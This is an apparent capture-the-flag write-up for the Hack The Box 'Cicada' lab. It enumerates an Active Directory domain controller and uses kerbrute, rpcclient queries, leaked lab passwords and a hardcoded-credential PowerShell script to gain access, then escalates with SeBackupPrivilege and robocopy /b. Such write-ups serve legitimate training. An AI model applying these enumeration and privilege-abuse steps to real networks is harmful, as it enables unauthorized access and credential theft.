Cicada Write-Up - HTB
Starting with nmap scan to discover active ports:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-23 00:52:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
53185/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-04-23T00:53:19
|_ start_date: N/AWe have a DC ahead. SMB and LDAP are primary enumeration targets.
SMB:
We have 2 interesting shares: DEV and HR.
Let's see what's inside the file!
We have password piece, now we miss username piece of puzzle.
I decided to run kerbrute to enumerate the active usernames in the domain:kerbrute userenum --dc cicada.htb -d cicada.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.tx
Unfortunately, this doesn't give us too much:
I now start thinking about the password itself... This string looks like a cipher! Given the box name is Cicada... Hmm, I love this.
So we have: Cicada$M6Corpb+QLp#nZp!8
It's interesting, this is a combination real-meaning words and obfuscated/random words. Let's take M6 for example, which could stand for March 6, or Marketing 6 Corp b. Hmm.
Cicada 3301 Tradecraft Considerations:
Null Cipher: Extract uppercase letters from obfuscated core:
L Z → Position 12 & 26 → 12+26=38 → 38th ASCII = '&' (Not useful)Base58 Encoding (BTC address format):
spBLgnbZp → Decodes to raw bytes: 1A 9C F3 (Invalid UTF-8)Vigenère Cipher (Key="CICADA"):
Decrypted: 8jW!q2sD → Doesn't resolve
I realized I am running in circles, it can't be cipher. I reverted to something easier in the meantime, more user enumeration. This time through:
Made a list:
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscarsOutput returned:
I tried running evil-winrm, but it seems we are not allowed to connect with our user. Maybe the company didn't apply all the rights yet 🥁
Tried running bloodhound to see what we have, but I realized there must be a chain here... Psexec didn't work neither.
So, I was thinking of doing some thorough rpcqueries with michael's creds.
rpcclient $> queryuser david.orelious
User Name : david.orelious
Full Name :
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Just in case I forget my password is aRt$Lp#7t*VQ!3
Workstations:
Comment :
Remote Dial :
Logon Time : Fri, 15 Mar 2024 08:32:22 EET
Logoff Time : Thu, 01 Jan 1970 02:00:00 EET
Kickoff Time : Thu, 14 Sep 30828 05:48:05 EEST
Password last set Time : Thu, 14 Mar 2024 14:17:30 EET
Password can change Time : Fri, 15 Mar 2024 14:17:30 EET
Password must change Time: Thu, 14 Sep 30828 05:48:05 EEST
unknown_2[0..31]...
user_rid : 0x454
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000000
padding1[0..7]...
logon_hrs[0..21]...
Just in case I don't forget his password!
Crispy!
The file contains:
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"A new combination found: emily.oscars - Q!3@Lp#M6b*7t*Vt
Cicada 3301, footholding: completed! -— We are about to be recruited by a top-secret organization now. Prepare.
Let's first check our local privileges by running whoami /all:
USER INFORMATION
----------------
User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.SeBackupPrivilege is on. Game is over.
Really easy stuff here, we won't spend time trying to dump NTDS.dit or making a shadow volume. We will directly "backup" the root flag :)
robocopy c:\users\administrator\desktop "C:\users\public\downloads" root.txt /mt /z /b
Cool machine. Easy af.
Last updated